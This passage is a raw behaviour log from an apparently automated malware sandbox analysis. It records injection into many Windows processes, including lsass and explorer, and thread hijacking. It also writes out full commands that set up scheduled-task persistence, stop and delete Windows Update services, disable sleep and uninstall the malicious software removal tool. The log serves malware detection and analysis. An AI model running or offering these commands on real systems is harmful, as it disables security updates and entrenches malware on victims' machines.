Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108B950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166960000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29D00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 3160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64500000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CB55570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D8C0730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 240D6250000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 227F2E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E71EBB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23E7F4D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 268D2E90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1A220F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 112C58A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\Desktop\GR55Qg1hth.exe base: 1B630F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B240000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\Desktop\F4R5fd8grr.exe base: 2730000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E9A6600000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21CEA710000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C25C740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sc.exe base: 17CD5980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20FE3BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe base: 23E07EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2E72A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A645CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 12762130000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BB2510000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25AB6AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19216AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B3680000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B36E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 270D5B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20717890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 162620F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0200000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0230000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 24C84EC0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: 3160000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\GR55Qg1hth.exe

Section loaded: NULL target: unknown protection: readonly

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Thread register set: target process: 7680	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Thread register set: target process: 7760	Jump to behavior
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Thread register set: target process: 4480
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Thread register set: target process: 2028
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Thread register set: target process: 4144

Writes to foreign memory regions

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Memory written: C:\Windows\System32\dialer.exe base: 4319A96010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108B950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166960000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29D00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: 3160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64500000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1CB55570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D8C0730000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 240D6250000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 227F2E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1E71EBB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23E7F4D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 268D2E90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1A220F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 112C58A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\Desktop\GR55Qg1hth.exe base: 1B630F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\AppData\Roaming\SubDir\Client.exe base: 1B240000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Users\user\Desktop\F4R5fd8grr.exe base: 2730000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E9A6600000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21CEA710000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1C25C740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sc.exe base: 17CD5980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20FE3BB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe base: 23E07EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C2E72A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1A645CD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 12762130000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 29BB2510000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 25AB6AE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 19216AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B3680000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1C1B36E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 270D5B50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 20717890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\schtasks.exe base: 162620F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0200000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Cuis\bon\Bara.exe base: 28AF0230000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 24C84EC0000

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731C9B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF731C9B110

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe "C:\Users\user\Desktop\gfiKDLgr58thy4d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\GR55Qg1hth.exe "C:\Users\user\Desktop\GR55Qg1hth.exe"	Jump to behavior
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Process created: C:\Users\user\Desktop\F4R5fd8grr.exe "C:\Users\user\Desktop\F4R5fd8grr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\Desktop\F4R5fd8grr.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Users\user\Desktop\F4R5fd8grr.exe	Process created: C:\Users\user\AppData\Roaming\SubDir\Client.exe "C:\Users\user\AppData\Roaming\SubDir\Client.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Process created: C:\Windows\System32\schtasks.exe "schtasks" /create /tn "3dfx Startup" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process created: unknown unknown
